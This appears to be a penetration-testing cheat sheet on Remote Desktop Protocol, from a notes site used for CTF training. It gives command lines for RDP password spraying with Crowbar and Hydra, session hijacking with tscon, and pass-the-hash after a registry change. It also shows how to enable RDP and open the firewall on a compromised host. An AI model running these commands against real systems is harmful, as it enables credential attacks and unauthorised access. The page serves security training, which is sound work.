DiscordHackTheBoxTryHackMeGitHub

RDP

ABOUT

Remote Desktop Protocol (RDP) is a protocol developed by Microsoft for remote access to a computer running the Windows OS. This protocol allows display and control commands to be transmitted via the GUI encrypted over IP networks. Works at Application Layer of TCP/IP model, typically using TCP/3389 port. If Network Address Translation (NAT) is used on the route between client and server, as is often the case with Internet connections, the remote computer needs the public IP address to reach the server. It uses TLS/SSL.

CONNECTING

Rdesktop

rdesktop -u venator17 -p 'amogus' -d domain.kek 13.13.13.13

Xfreerdp

Regular

xfreerdp /u:venator17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore

With Port-Forwarding

xfreerdp /u:venator17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore

Mounting a local dir

xfreerdp /v:13.13.13.13 /u:venator17 /p:amogus /drive:share,/home/venator17/Assessment123

Remmina (GUI)

reminna

PASSWORD SPRAYING

Crowbar

crowbar -b rdp -s 13.13.13.13/32 -U users.txt -c 'amogus'

Hydra

hydra -L users.txt -p 'amogus' 13.13.13.13 rdp

SESSION HIJACKING

We need SYSTEM privileges and use tscon.exe (allows to connect to another desktop session) [LINK]

tscon 13 /dest:V17

PASS-THE-HASH

By default, Windows has disabled Restricted Admin Mode, and we need to fix that by adding new registry key to DisableRestrictedAdmin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

And then to use xfreerdp for Pass The Hash

xfreerdp /v:13.13.13.13 /u:venator17 /pth:12379NSKDFKSJDF20931C031

ENABLE FROM SYSTEM

As example one time I needed to access internal host, so it would be good if I turned on rdp and made a port forwarding, So here's the steps do do it

  1. Change fDenyTSConnections Registry key which denies RDP connections

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# OR same thing but with PowerShell, to convenience

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0

  1. Changing a Firewall to allow us to move through RDP

netsh advfirewall firewall set rule group='remote desktop' new enable=yes

Tips2Hack

  1. Nmap RDP Scan

nmap -sV -sC 13.13.13.13 -p3389 --script rdp*

  1. RDP Security Check [LINK]

./rdp-sec-check.pl 13.13.13.13
PreviousSSHNextSMTP

Last updated